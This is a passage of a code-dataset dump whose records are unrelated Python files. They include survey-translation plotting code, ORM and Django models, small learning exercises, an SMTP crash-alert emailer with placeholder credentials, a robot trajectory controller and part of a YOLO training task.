df.loc[df[i] == \"Zeer comfortabel\", i] = \"Very comfortable\"\n \n #Secure, insecure\n df.loc[df[9] == \"Zeer onveilig\", 9] = \"Very insecure\"\n df.loc[df[9] == \"Onveilig\", 9] = \"Insecure\"\n df.loc[df[9] == \"Veilig\", 9] = \"Secure\"\n df.loc[df[9] == \"Zeer veilig\", 9] = \"Very secure\"\n \n #Yes, No\n for i in list([11, 12]):\n df.loc[df[i] == \"Ja\", i] = \"Yes\"\n df.loc[df[i] == \"Nee\", i] = \"No\"\n df.loc[df[i] == \"Het hangt af van de service\", i] = \"Depends on service\"\n \n #q3\n df.loc[df[3] == \"Very positive\", 3] = \"I enjoy receiving personalised suggestions\"\n df.loc[df[3] == \"Positive\", 3] = \"Suggestions are sometimes helpful\"\n df.loc[df[3] == \"Negative\", 3] = \"I feel uncomfortable\"\n df.loc[df[3] == \"Very negative\", 3] = \"They shouldn’t provide such suggestions\"\n \n #q10\n df.loc[df[10] == \"Exclusief online interactie\", 10] = \"Exclusively online interaction\"\n df.loc[df[10] == \"Exclusief offline interactie\", 10] = \"Exclusively offline interaction\"\n df.loc[df[10] == \"Mix van online en offline interactie\", 10] = \"A mix of online and offline interaction\"\n df.loc[df[10] == \"Geen mening\", 10] = \"I don't know\"\n \n #\n print(\"...Dutch responses have been translated.\")\n return df\n \n \n def get_joined_dfs(self):\n df = self.get_gsheet(\"DSS x Digital Government Haarlem (Responses)\")\n \n df_dutch = self.get_gsheet(\"DSS x Digital Government Haarlem (Responses) Dutch\")\n df_trans = self.transl_dutch_df(df_dutch)\n df = pd.concat([df, df_trans]).reset_index().drop(columns=\"index\")\n \n #adding count column to dataset\n df[\"count\"] = 1 \n print(\"...Dutch responses have been joined to English Reponses.\")\n return df\n \n \n def order_choose(self, df, q):\n order_com = [\"Very comfortable\", \"Comfortable\", \"Uncomfortable\", \"Very uncomfortable\"] #\"I don't know\"]\n order_pos = [\"Very positive\", \"Positive\", \"Negative\", \"Very negative\"] # \"I don't know\"]\n order_sec = [\"Very secure\", \"Secure\", \"Insecure\", \"Very insecure\"] #, \"I don't know\"]\n order_yn = [\"Yes\", \"No\"]\n \n #df = self.get_joined_dfs()\n running = True\n while running:\n order_chosen = None\n for i in list(df[q]):\n for j in order_com:\n if i == j:\n order_chosen = order_com\n running = False\n \n for j in order_pos:\n if i == j:\n order_chosen = order_pos\n running = False\n \n for j in order_sec:\n if i == j:\n order_chosen = order_sec\n running = False\n \n for j in order_yn:\n if i == j:\n order_chosen = order_yn\n running = False\n \n if order_chosen == None:\n print(\"Something went wrong in choosing the order of the countplot labels :(\") \n running = False\n \n return order_chosen \n \n \n def save_pn_plots(self): \n \n q_parent = self.q_parent\n q_child = self.q_child\n df = self.get_joined_dfs()\n \n order_chosen_parent = self.order_choose(df, q_parent)\n \n print(\"...Dataframe is ready.\")\n \n fig = plt.figure()\n plt.title(\"Q\"+str(q_parent))\n \n sns.set(rc={'figure.figsize':(10,5)})\n a = sns.countplot(df[q_parent], order = order_chosen_parent, palette = \"GnBu_d\")\n a.tick_params(labelsize=15, rotation=0)\n \n fig.savefig(\"countplots/Q\"+str(q_parent)+\".png\")\n print(\"...Parent plot has been generated.\")\n \n #---within POSITIVE response of Q_parent\n dfp = df.loc[((df[q_parent] == \"Positive\") | (df[q_parent] == \"Very positive\") | (df[q_parent] == \"Very comfortable\") | (df[q_parent] == \"Comfortable\"))] \n #---within NEGATIVE response of Q_parent\n dfn = df.loc[((df[q_parent] == \"Negative\") | (df[q_parent] == \"Very negative\") | (df[q_parent] == \"Very uncomfortable\") | (df[q_parent] == \"Uncomfortable\"))]\n\n order_chosen_child = self.order_choose(df, q_child)\n\n #pos\n fig_pos = plt.figure()\n plt.title(\"P-Q\"+str(q_parent)+\" & Q\"+str(q_child))\n sns.set(rc={'figure.figsize':(10,5)})\n b = sns.countplot(dfp[q_child], order = order_chosen_child, palette = \"GnBu_d\")\n b.tick_params(labelsize=15, rotation=0)\n print(\"...Poitive child plot has been generated.\")\n \n #neg\n fig_neg = plt.figure()\n plt.title(\"N-Q\"+str(q_parent)+\" & Q\"+str(q_child))\n sns.set(rc={'figure.figsize':(10,5)})\n c = sns.countplot(dfn[q_child], order = order_chosen_child, palette = \"GnBu_d\")\n c.tick_params(labelsize=15, rotation=0)\n print(\"...Negative child plot has been generated.\")\n \n fig_pos.savefig(\"countplots/P-Q\"+str(q_parent)+\"&Q\"+str(q_child)+\".png\")\n fig_neg.savefig(\"countplots/N-Q\"+str(q_parent)+\"&Q\"+str(q_child)+\".png\")\n \n print(\"...End: 3 countplots have been saved to Project01/countplots.\")\n \n \n \n \n ## def percent(df, column):\n ## df[\"percent\"] = df[column].value_counts(normalize=True)\n ## return df\n \n \n \n \n \n \n","sub_path":"gsheet_tools.py","file_name":"gsheet_tools.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"14588648","text":"#\n# Copyright (c) 2020 Cord Technologies Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collections import OrderedDict\n\nfrom cord.orm import base_orm\n\n\nclass Model(base_orm.BaseORM):\n \"\"\"\n Model base ORM.\n\n ORM:\n\n \"\"\"\n\n DB_FIELDS = OrderedDict([])\n\n\nclass ModelInferenceParams(base_orm.BaseORM):\n \"\"\"\n Model inference parameters for running models trained via the platform.\n\n ORM:\n\n local_file_path,\n conf_thresh,\n iou_thresh,\n device\n detection_frame_range (optional)\n\n \"\"\"\n\n DB_FIELDS = OrderedDict([\n (\"files\", list),\n (\"conf_thresh\", float), # Confidence threshold\n (\"iou_thresh\", float), # Intersection over union threshold\n (\"device\", str),\n (\"detection_frame_range\", list)\n ])\n","sub_path":"cord/orm/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"39052398","text":"\"\"\"\nThis module contains my first Class, which makes simple operations.\n\"\"\"\n\n\nimport doctest\n\n\nclass Markets:\n \"\"\"\n This class makes creates objects - markets.\n\n >>> market_family_food.name\n 'Family Food'\n >>> print(market_family_food)\n Supermarket Family Food has an area of 80 m2 and has the following\\\n categories: Bread and Bakery, Dairy, Beverages.\n \"\"\"\n\n def __init__(self, name, area, categories):\n self.name = name\n self.area = area\n self.categories = categories\n\n def __str__(self):\n \"\"\"\n THis function converts inputed information to the complete santence.\n \"\"\"\n return \"Supermarket \" + self.name + \\\n \" has an area of \" + str(self.area) + \\\n \" m2 and has the following categories: \" + \\\n str(\", \".join(self.categories)) + \".\"\n\n\nif __name__ == \"__main__\":\n market_family_food = Markets(\n 'Family Food', 80, ['Bread and Bakery', 'Dairy', 'Beverages'])\n print(market_family_food.name)\n\n print(market_family_food.area)\n\n print(market_family_food.categories)\n\n print(market_family_food)\nprint(doctest.testmod())\n","sub_path":"labwork4/Name_Surname_markets.py","file_name":"Name_Surname_markets.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"501719308","text":"\nimport random\n\n# try/except\n\nclass MyException(Exception):\n def __init__(self, *args, **kwargs):\n # super(self, *args, **kwargs) # this will raise error as Exception is not new-style class\n Exception.__init__(self, *args, **kwargs)\n\ntry:\n print(\"Are you happy?\")\n rndInt = random.randrange(3)\n if rndInt == 0:\n assert False, 'I am a little low'\n elif rndInt == 1:\n raise MyException('Something is wrong')\n else:\n raise Exception('just not good')\nexcept AssertionError as ae:\n print(f\"alert: {str(ae)}\")\n print('=> ok, drink a cup of coffee...')\nexcept MyException as myEx:\n print(f\"alert: {str(myEx)}\")\n print(\"=> come on cheer up!\")\nexcept Exception as ex:\n print(f\"alert: {str(ex)}\")\n print('=> no worries, you still got wifi')\nelse: # will run when there's no exception\n print(f\"no alert raised!\")\nfinally:\n print(\"===> we'll be fine\")\n\n\n","sub_path":"test_exception.py","file_name":"test_exception.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"21548459","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: CodeJZY\n@license: (C) Copyright 2019, Node Supply Chain Manager Corporation Limited.\n@contact: 634799086@qq.com\n@file: 最大子序和.py\n@time: 2019/12/10 20:10\n@desc:\n'''\n# def find_max(arr):\n# if len(arr) == 1:\n# return arr,arr[0]\n# # 后续\n# next_result = find_max(arr[1:])\n# return ([arr[0]],arr[0]) if arr[0] > arr[0]+next_result[1] else ([arr[0]]+next_result[0],arr[0]+next_result[1])\n# def find_arr(nums):\n# results = nums[:]\n# # 全部结果\n# for i,item in enumerate(nums):\n# results.append(find_max(nums[i:]))\n# results = list(sorted(results,key=lambda data:data[1]))[-1]\n# return results\n# print(find_arr([1,2,3,4,5]))\n\nfrom collections import defaultdict\nclass Solution(object):\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n result = defaultdict(int)\n aim = len(nums)//2\n for i,num in enumerate(nums):\n print(num)\n result[num] += 1\n if result[num] > aim:\n return r\nprint(Solution().majorityElement([3,2,3]))","sub_path":"力扣/最大子序和.py","file_name":"最大子序和.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422273266","text":"import os\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\n\n\ndef SendMail(ImgFileName):\n img_data = open(ImgFileName, 'rb').read()\n msg = MIMEMultipart()\n msg['Subject'] = 'Crash Alert'\n msg['From'] = 'sample@gmail.com.cc'\n msg['To'] = 'sample@gmail.com.cc'\n\n text = MIMEText(\"Vehicle Crash Detected. Send HELP\")\n msg.attach(text)\n image = MIMEImage(img_data, name=os.path.basename(ImgFileName))\n msg.attach(image)\n\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.ehlo()\n s.login(\"sample_sender@gmail.com\", \"sample_password\")\n s.sendmail(\"sample_sender@gmail.com\", \"sample_receiver@gmail.com\", msg.as_string())\n s.quit()","sub_path":"image_email_car.py","file_name":"image_email_car.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"212880935","text":"from django.db import models\n\n\nclass ElectionDay(models.Model):\n \"\"\"\n A day on which one or many elections can be held.\n \"\"\"\n uid = models.CharField(\n max_length=500,\n primary_key=True,\n editable=False,\n blank=True\n )\n\n slug = models.SlugField(\n blank=True, max_length=255, unique=True, editable=False\n )\n\n date = models.DateField(unique=True)\n cycle = models.ForeignKey(\n 'ElectionCycle', related_name='elections_days',\n on_delete=models.PROTECT)\n\n def __str__(self):\n return self.uid\n\n def save(self, *args, **kwargs):\n \"\"\"\n **uid**: :code:`{cycle.uid}_date:{date}`\n \"\"\"\n self.uid = '{}_date:{}'.format(\n self.cycle.uid,\n self.date\n )\n self.slug = '{}'.format(self.date)\n super(ElectionDay, self).save(*args, **kwargs)\n\n def special_election_datestring(self):\n \"\"\"\n Formatted date string used in URL for special elections.\n \"\"\"\n return self.date.strftime('%b-%d').lower()\n","sub_path":"election/models/election_day.py","file_name":"election_day.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616232404","text":"\n\nimport rospy\nimport numpy as np\nfrom std_msgs.msg import Float32MultiArray\nfrom Model import Model\nfrom . import PDController\nfrom sensor_msgs.msg import JointState\nfrom . import ControllerBase\nfrom GaitAnaylsisToolkit.LearningTools.Models import ModelBase\nimport rbdl\nimport copy\nimport time\n\n\nclass MPController(ControllerBase.BaseController):\n\n def __init__(self, model, runner):\n \"\"\"\n\n :param model:\n :param kp:\n :param kd:\n \"\"\"\n self._runner = runner\n self.expData = self._runner.get_expData()\n\n self.max_steps = 0\n self.step = 0\n super(MPController, self).__init__(model)\n self.rbdl_model = self._model._model\n self.initilzie()\n self.u = np.array([0, 0, 0, 0, 0, 0, 0])\n self.K2, self.tau, self.J_ = self.run_iLQR()\n self._x = self._runner.get_start()\n self._dx = np.zeros(len(self._x)).reshape((-1, 1))\n self._ddx = np.zeros(len(self._x)).reshape((-1, 1))\n\n self._kp = 50.0\n self._kc = 10.0\n Kp = np.zeros((7, 7))\n Kd = np.zeros((7, 7))\n\n Kp_hip = 100.0\n Kd_hip = 0.5\n\n Kp_knee = 125.0\n Kd_knee = 1.0\n\n Kp_ankle = 100.0\n Kd_ankle = 0.4\n\n Kp[0, 0] = Kp_hip\n Kd[0, 0] = Kd_hip\n Kp[1, 1] = Kp_knee\n Kd[1, 1] = Kd_knee\n Kp[2, 2] = Kp_ankle\n Kd[2, 2] = Kd_ankle\n\n Kp[3, 3] = Kp_hip\n Kd[3, 3] = Kd_hip\n Kp[4, 4] = Kp_knee\n Kd[4, 4] = Kd_knee\n Kp[5, 5] = Kp_ankle\n Kd[5, 5] = Kd_ankle\n\n self.pdController = PDController.PDController(model, Kp, Kd)\n\n def initilzie(self):\n count = 0\n self.u = []\n self.K = []\n A_ = []\n b_ = []\n J = 0\n self.max_steps = self._runner.get_length()\n P = self._runner._data[\"P\"]\n start = self._runner.get_start()\n q = np.array([q[0] for q in start])\n qd = np.zeros(self.rbdl_model.qdot_size)\n y = np.concatenate((q, qd))\n tau = []\n\n while count < self._runner.get_length():\n self._runner.step()\n self.K.append(self._runner.K)\n u_raw = np.array(self._runner.ddx)\n x_raw = np.array(self._runner.x)\n xd_raw = np.array(self._runner.dx)\n tau.append(u_raw)\n u = np.array([q[0] for q in u_raw])\n x = np.array([q[0] for q in x_raw])\n xd = np.array([q[0] for q in xd_raw])\n y = np.concatenate((x, xd))\n #y2 = Model.runge_integrator(self.rbdl_model, y, 0.01, u)\n A, b = Model.finite_differences(self.rbdl_model, y, u, h=0.01)\n J += np.dot(np.dot(y.reshape((-1, 1)).T, (P[count])), y.reshape((-1, 1)))\n A_.append(A)\n b_.append(b)\n count += 1\n\n self.A = A_\n self.b = b_\n self.J = J\n\n def run_iLQR(self):\n A = self.A\n b = self.b\n eps = 1.0\n J = self.J\n print(J)\n while eps > 0.001:\n\n P, K = self.back_pass(A, b)\n A, b, J_, tau = self.foward_pass(K, P)\n eps = abs(J-J_)/J\n J = J_\n\n return K, tau, J_\n\n def foward_pass(self, K, P):\n count = 0\n h = 0.01\n A_ = []\n b_ = []\n x = self._runner.get_start()\n v0 = np.zeros(len(x)).reshape((-1, 1))\n J = 0\n y = np.concatenate((x, v0))\n tau = []\n\n while count < self.max_steps:\n # add ut here\n u = K[count].dot(np.vstack((self.expData[:, count].reshape((-1,1)), v0)) - y).flatten()\n # u = np.zeros(self.rbdl_model.qdot_size)\n y = Model.runge_integrator(self.rbdl_model, y.flatten(), h, u)\n A, b = Model.finite_differences(self.rbdl_model, y, u)\n A_.append(A)\n b_.append(b)\n J += np.dot(np.dot(y.reshape((-1, 1)).T, (P[count])), y.reshape((-1, 1)))\n tau.append(u)\n y = np.array([ [q] for q in y])\n count += 1\n\n return A_, b_, J, tau\n\n\n def back_pass(self, A, b):\n # need to get cost\n expSigma = self._runner._data[\"expSigma\"]\n ric = solve_riccati_mat(expSigma, A, b)\n P = ric[\"P\"]\n K = ric[\"K\"]\n return P, K\n\n def calc_tau(self, q=None, qd=None, qdd=None, other=None):\n \"\"\"\n\n :param q:\n :param qd:\n :param qdd:\n :return:\n \"\"\"\n # t = time.process_time()\n # self.K2_, self.tau_, self.J_ = self.run_iLQR()\n # elapsed_time = time.process_time() - t\n # print(elapsed_time)\n\n aq = np.zeros(7)\n if self.step == int(other[0]):\n v0 = np.zeros(len(self._x)).reshape((-1, 1))\n x_ = np.append(self._x, self._dx).reshape((-1, 1))\n #x_ = np.append(q[0:6], qd[0:6]).reshape((-1, 1))\n\n #K = np.append(np.eye(6) * self._kp, np.eye(6) * self._kc, 1)\n #self.u = K.dot(np.vstack((self.expData[:, self.step].reshape((-1, 1)), v0)) - x_)\n self.u = self.K2[self.step].dot(np.vstack((self.expData[:, self.step].reshape((-1, 1)), v0)) - x_)\n\n self._dx = self._dx + self.u * 0.01\n self._x = self._x + self._dx * 0.01\n self.step += 1\n self.u = np.append(self.u, [0.0])\n\n\n e = np.append(self._x, [0.0]) - self._model.q\n ed = np.append(self._dx, [0.0]) - self._model.qd\n aq = self.pdController.calc_tau(e, ed)\n self.tau = self.u #self._model.calculate_dynamics(qdd)\n return self.tau\n\n\ndef solve_riccati_mat(expSigma, A=None, B=None, dt=0.01, reg=1e-5):\n ric = {}\n size = expSigma[0].shape[0]\n if A is None:\n Ad = np.kron([[0, 1],[0, 0]], np.eye(size))*dt + np.eye(2*size)\n else:\n Ad = A\n if B is None:\n Bd = np.kron([[0], [1]], np.eye(size)) * dt\n else:\n Bd = B\n\n Q = np.zeros((size*2, size*2))\n R = np.eye(size)*reg\n P = [np.zeros((size*2, size*2))] * len(expSigma)\n P[-1][:size, :size] = np.linalg.pinv(expSigma[-1])\n K = [np.zeros((size*2, size*2))] * len(expSigma)\n for ii in range(len(expSigma)-2, -1, -1):\n Q[:size, :size] = np.linalg.pinv(expSigma[ii])\n B = P[ii + 1].dot(Bd[ii])\n C = np.linalg.pinv(np.dot(Bd[ii].T.dot(P[ii + 1]), Bd[ii]) + R)\n D = Bd[ii].T.dot(P[ii + 1])\n F = np.dot(np.dot(Ad[ii].T, B.dot(C).dot(D) - P[ii + 1]), Ad[ii])\n P[ii] = Q - F\n\n size = expSigma[0].shape[0]\n for i in range(len(expSigma)):\n v = np.linalg.inv(np.dot(np.dot(Bd[i].T, P[i]), Bd[i]) + R)\n K[i] = np.dot(np.dot(v.dot(Bd[i].T), P[i]), Ad[i])\n\n ric[\"Ad\"] = Ad\n ric[\"Bd\"] = Bd\n ric[\"R\"] = R\n ric[\"P\"] = P\n ric[\"K\"] = K\n return ric","sub_path":"Controller/MPController.py","file_name":"MPController.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427737939","text":"# Copyright 2023 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Contains classes used to train Yolo.\"\"\"\n\nimport collections\nfrom typing import Optional\n\nfrom absl import logging\nimport tensorflow as tf\n\nfrom official.common import dataset_fn\nfrom official.core import base_task\nfrom official.core import config_definitions\nfrom official.core import input_reader\nfrom official.core import task_factory\nfrom official.modeling import performance\nfrom official.projects.yolo import optimization\nfrom official.projects.yolo.configs import yolo as exp_cfg\nfrom official.projects.yolo.dataloaders import tf_example_decoder\nfrom official.projects.yolo.dataloaders import yolo_input\nfrom official.projects.yolo.modeling import factory\nfrom official.projects.yolo.ops import kmeans_anchors\nfrom official.projects.yolo.ops import mosaic\nfrom official.projects.yolo.ops import preprocessing_ops\nfrom official.projects.yolo.tasks import task_utils\nfrom official.vision.dataloaders import tfds_factory\nfrom official.vision.dataloaders import tf_example_label_map_decoder\nfrom official.vision.evaluation import coco_evaluator\nfrom official.vision.ops import box_ops\n\nOptimizationConfig = optimization.OptimizationConfig\nRuntimeConfig = config_definitions.RuntimeConfig\n\n\n@task_factory.register_task_cls(exp_cfg.YoloTask)\nclass YoloTask(base_task.Task):\n \"\"\"A single-replica view of training procedure.\n\n YOLO task provides artifacts for training/evalution procedures, including\n loading/iterating over Datasets, initializing the model, calculating the loss,\n post-processing, and customized metrics with reduction.\n \"\"\"\n\n def __init__(self, params, logging_dir: Optional[str] = None):\n super().__init__(params, logging_dir)\n self.coco_metric = None\n self._loss_fn = None\n self._model = None\n self._coco_91_to_80 = False\n self._metrics = []\n\n # globally set the random seed\n preprocessing_ops.set_random_seeds(seed=params.seed)\n\n if self.task_config.model.anchor_boxes.generate_anchors:\n self.generate_anchors()\n return\n\n def generate_anchors(self):\n \"\"\"Generate Anchor boxes for an arbitrary object detection dataset.\"\"\"\n input_size = self.task_config.model.input_size\n anchor_cfg = self.task_config.model.anchor_boxes\n backbone = self.task_config.model.backbone.get()\n\n dataset = self.task_config.train_data\n decoder = self._get_data_decoder(dataset)\n\n num_anchors = backbone.max_level - backbone.min_level + 1\n num_anchors *= anchor_cfg.anchors_per_scale\n\n gbs = dataset.global_batch_size\n dataset.global_batch_size = 1\n box_reader = kmeans_anchors.BoxGenInputReader(\n dataset,\n dataset_fn=dataset_fn.pick_dataset_fn(\n self.task_config.train_data.file_type),\n decoder_fn=decoder.decode)\n\n boxes = box_reader.read(\n k=num_anchors,\n anchors_per_scale=anchor_cfg.anchors_per_scale,\n image_resolution=input_size,\n scaling_mode=anchor_cfg.scaling_mode,\n box_generation_mode=anchor_cfg.box_generation_mode,\n num_samples=anchor_cfg.num_samples)\n\n dataset.global_batch_size = gbs\n\n with open('anchors.txt', 'w') as f:\n f.write(f'input resolution: {input_size} \\n boxes: \\n {boxes}')\n logging.info('INFO: boxes will be saved to anchors.txt, mack sure to save'\n 'them and update the boxes feild in you yaml config file.')\n\n anchor_cfg.set_boxes(boxes)\n return boxes\n\n def build_model(self):\n \"\"\"Build an instance of Yolo.\"\"\"\n\n model_base_cfg = self.task_config.model\n l2_weight_decay = self.task_config.weight_decay / 2.0\n\n input_size = model_base_cfg.input_size.copy()\n input_specs = tf.keras.layers.InputSpec(shape=[None] + input_size)\n l2_regularizer = (\n tf.keras.regularizers.l2(l2_weight_decay) if l2_weight_decay else None)\n model, losses = factory.build_yolo(\n input_specs, model_base_cfg, l2_regularizer)\n model.build(input_specs.shape)\n model.summary(print_fn=logging.info)\n\n # save for later usage within the task.\n self._loss_fn = losses\n self._model = model\n return model\n\n def _get_data_decoder(self, params):\n \"\"\"Get a decoder object to decode the dataset.\"\"\"\n if params.tfds_name:\n decoder = tfds_factory.get_detection_decoder(params.tfds_name)\n else:\n decoder_cfg = params.decoder.get()\n if params.decoder.type == 'simple_decoder':\n self._coco_91_to_80 = decoder_cfg.coco91_to_80\n decoder = tf_example_decoder.TfExampleDecoder(\n coco91_to_80=decoder_cfg.coco91_to_80,\n regenerate_source_id=decoder_cfg.regenerate_source_id)\n elif params.decoder.type == 'label_map_decoder':\n decoder = tf_example_label_map_decoder.TfExampleDecoderLabelMap(\n label_map=decoder_cfg.label_map,\n regenerate_source_id=decoder_cfg.regenerate_source_id)\n else:\n raise ValueError('Unknown decoder type: {}!'.format(\n params.decoder.type))\n return decoder\n\n def build_inputs(self, params, input_context=None):\n \"\"\"Build input dataset.\"\"\"\n model = self.task_config.model\n\n # get anchor boxes dict based on models min and max level\n backbone = model.backbone.get()\n anchor_dict, level_limits = model.anchor_boxes.get(backbone.min_level,\n backbone.max_level)\n\n params.seed = self.task_config.seed\n # set shared patamters between mosaic and yolo_input\n base_config = dict(\n letter_box=params.parser.letter_box,\n aug_rand_translate=params.parser.aug_rand_translate,\n aug_rand_angle=params.parser.aug_rand_angle,\n aug_rand_perspective=params.parser.aug_rand_perspective,\n area_thresh=params.parser.area_thresh,\n random_flip=params.parser.random_flip,\n seed=params.seed,\n )\n\n # get the decoder\n decoder = self._get_data_decoder(params)\n\n # init Mosaic\n sample_fn = mosaic.Mosaic(\n output_size=model.input_size,\n mosaic_frequency=params.parser.mosaic.mosaic_frequency,\n mixup_frequency=params.parser.mosaic.mixup_frequency,\n jitter=params.parser.mosaic.jitter,\n mosaic_center=params.parser.mosaic.mosaic_center,\n mosaic_crop_mode=params.parser.mosaic.mosaic_crop_mode,\n aug_scale_min=params.parser.mosaic.aug_scale_min,\n aug_scale_max=params.parser.mosaic.aug_scale_max,\n **base_config)\n\n # init Parser\n parser = yolo_input.Parser(\n output_size=model.input_size,\n anchors=anchor_dict,\n use_tie_breaker=params.parser.use_tie_breaker,\n jitter=params.parser.jitter,\n aug_scale_min=params.parser.aug_scale_min,\n aug_scale_max=params.parser.aug_scale_max,\n aug_rand_hue=params.parser.aug_rand_hue,\n aug_rand_saturation=params.parser.aug_rand_saturation,\n aug_rand_brightness=params.parser.aug_rand_brightness,\n max_num_instances=params.parser.max_num_instances,\n scale_xy=model.detection_generator.scale_xy.get(),\n expanded_strides=model.detection_generator.path_scales.get(),\n darknet=model.darknet_based_model,\n best_match_only=params.parser.best_match_only,\n anchor_t=params.parser.anchor_thresh,\n random_pad=params.parser.random_pad,\n level_limits=level_limits,\n dtype=params.dtype,\n **base_config)\n\n # init the dataset reader\n reader = input_reader.InputReader(\n params,\n dataset_fn=dataset_fn.pick_dataset_fn(params.file_type),\n decoder_fn=decoder.decode,\n sample_fn=sample_fn.mosaic_fn(is_training=params.is_training),\n parser_fn=parser.parse_fn(params.is_training))\n dataset = reader.read(input_context=input_context)\n return dataset\n\n def build_metrics(self, training=True):\n \"\"\"Build detection metrics.\"\"\"\n metrics = []\n\n backbone = self.task_config.model.backbone.get()\n metric_names = collections.defaultdict(list)\n for key in range(backbone.min_level, backbone.max_level + 1):\n key = str(key)\n metric_names[key].append('loss')\n metric_names[key].append('avg_iou')\n metric_names[key].append('avg_obj')\n\n metric_names['net'].append('box')\n metric_names['net'].append('class')\n metric_names['net'].append('conf')\n\n for _, key in enumerate(metric_names.keys()):\n metrics.append(task_utils.ListMetrics(metric_names[key], name=key))\n\n self._metrics = metrics\n if not training:\n annotation_file = self.task_config.annotation_file\n if self._coco_91_to_80:\n annotation_file = None\n self.coco_metric = coco_evaluator.COCOEvaluator(\n annotation_file=annotation_file,\n include_mask=False,\n need_rescale_bboxes=False,\n per_category_metrics=self._task_config.per_category_metrics,\n max_num_eval_detections=self.task_config.max_num_eval_detections)\n\n return metrics\n\n def build_losses(self, outputs, labels, aux_losses=None):\n \"\"\"Build YOLO losses.\"\"\"\n return self._loss_fn(labels, outputs)\n\n def train_step(self, inputs, model, optimizer, metrics=None):\n \"\"\"Train Step.\n\n Forward step and backwards propagate the model.\n\n Args:\n inputs: a dictionary of input tensors.\n model: the model, forward pass definition.\n optimizer: the optimizer for this training step.\n metrics: a nested structure of metrics objects.\n\n Returns:\n A dictionary of logs.\n \"\"\"\n image, label = inputs\n\n with tf.GradientTape(persistent=False) as tape:\n # Compute a prediction\n y_pred = model(image, training=True)\n\n # Cast to float32 for gradietn computation\n y_pred = tf.nest.map_structure(lambda x: tf.cast(x, tf.float32), y_pred)\n\n # Get the total loss\n (scaled_loss, metric_loss,\n loss_metrics) = self.build_losses(y_pred['raw_output'], label)\n\n # Scale the loss for numerical stability\n if isinstance(optimizer, tf.keras.mixed_precision.LossScaleOptimizer):\n scaled_loss = optimizer.get_scaled_loss(scaled_loss)\n\n # Compute the gradient\n train_vars = model.trainable_variables\n gradients = tape.gradient(scaled_loss, train_vars)\n\n # Get unscaled loss if we are using the loss scale optimizer on fp16\n if isinstance(optimizer, tf.keras.mixed_precision.LossScaleOptimizer):\n gradients = optimizer.get_unscaled_gradients(gradients)\n\n # Apply gradients to the model\n optimizer.apply_gradients(zip(gradients, train_vars))\n logs = {self.loss: metric_loss}\n\n # Compute all metrics\n if metrics:\n for m in metrics:\n m.update_state(loss_metrics[m.name])\n logs.update({m.name: m.result()})\n return logs\n\n def _reorg_boxes(self, boxes, info, num_detections):\n \"\"\"Scale and Clean boxes prior to Evaluation.\"\"\"\n mask = tf.sequence_mask(num_detections, maxlen=tf.shape(boxes)[1])\n mask = tf.cast(tf.expand_dims(mask, axis=-1), boxes.dtype)\n\n # Denormalize the boxes by the shape of the image\n inshape = tf.expand_dims(info[:, 1, :], axis=1)\n ogshape = tf.expand_dims(info[:, 0, :], axis=1)\n scale = tf.expand_dims(info[:, 2, :], axis=1)\n offset = tf.expand_dims(info[:, 3, :], axis=1)\n\n boxes = box_ops.denormalize_boxes(boxes, inshape)\n boxes = box_ops.clip_boxes(boxes, inshape)\n boxes += tf.tile(offset, [1, 1, 2])\n boxes /= tf.tile(scale, [1, 1, 2])\n boxes = box_ops.clip_boxes(boxes, ogshape)\n\n # Mask the boxes for usage\n boxes *= mask\n boxes += (mask - 1)\n return boxes\n\n def validation_step(self, inputs, model, metrics=None):\n \"\"\"Validatation step.\n\n Args:\n inputs: a dictionary of input tensors.\n model: the keras.Model.\n metrics: a nested structure of metrics objects.\n\n Returns:\n A dictionary of logs.\n \"\"\"\n image, label = inputs\n\n # Step the model once\n y_pred = model(image, training=False)\n y_pred = tf.nest.map_structure(lambda x: tf.cast(x, tf.float32), y_pred)\n (_, metric_loss, loss_metrics) = self.build_losses(y_pred['raw_output'],\n label)\n logs = {self.loss: metric_loss}\n\n # Reorganize and rescale the boxes\n info = label['groundtruths']['image_info']\n boxes = self._reorg_boxes(y_pred['bbox'], info, y_pred['num_detections'])\n\n # Build the input for the coc evaluation metric\n coco_model_outputs = {\n 'detection_boxes': boxes,\n 'detection_scores': y_pred['confidence'],\n 'detection_classes': y_pred['classes'],\n 'num_detections': y_pred['num_detections'],\n 